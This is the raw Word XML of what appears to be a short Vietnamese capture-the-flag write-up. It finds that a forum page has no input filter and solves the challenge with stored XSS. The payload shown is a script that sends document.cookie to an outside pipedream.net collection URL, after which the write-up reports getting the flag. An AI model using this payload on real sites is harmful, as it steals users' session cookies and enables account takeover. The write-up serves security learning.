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0C9" w14:textId="259FB084" w:rsidR="00231799" w:rsidRDefault="0023179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Đầu tiên vào trang web thì ta chưa thấy đây là 1 web forum thông thường, ta sẽ kiểm tra source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D04935" w14:textId="3797DCE1" w:rsidR="00231799" w:rsidRDefault="0023179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1799">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58016C6B" wp14:editId="01B1B91B">
            <wp:extent cx="5943600" cy="3078480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="16307414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1477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3BF" w14:textId="27A25C7A" w:rsidR="00231799" w:rsidRPr="00231799" w:rsidRDefault="0023179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Thấy không có filter, ta sẽ thực hiện tấn công bằng lệnh bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8D357" w14:textId="77777777" w:rsidR="00231799" w:rsidRDefault="00231799" w:rsidP="00231799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:hAnsi="Lora"/>
          <w:color w:val="656565"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:hAnsi="Lora"/>
          <w:color w:val="656565"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write(“&lt;img src=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE695F">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:hAnsi="Lora"/>
          <w:color w:val="656565"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://eon5wu9esj2rcgn.m.pipedream.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:hAnsi="Lora"/>
          <w:color w:val="656565"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>?=”+document.cookie+”’&gt;&lt;/img&gt;”);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49023570" w14:textId="77777777" w:rsidR="00231799" w:rsidRDefault="0023179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31AB614" w14:textId="1AC2779C" w:rsidR="00231799" w:rsidRDefault="00231799">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5386F825" wp14:editId="6EDE0AC3">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="77780856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8568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537F" w14:textId="57396A9C" w:rsidR="00231799" w:rsidRDefault="00231799">
      <w:r>
        <w:t>Ta có được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D4D3B" w14:textId="2043535E" w:rsidR="00231799" w:rsidRDefault="00231799">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E20800" wp14:editId="59A09C73">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="113723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7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E0"/>
    <w:rsid w:val="00231799"/>
    <w:rsid w:val="009357C5"/>
    <w:rsid w:val="00CE695F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28E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{83917678-93DD-4F4E-995C-DD436013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2023-04-05T18:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-05T18:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>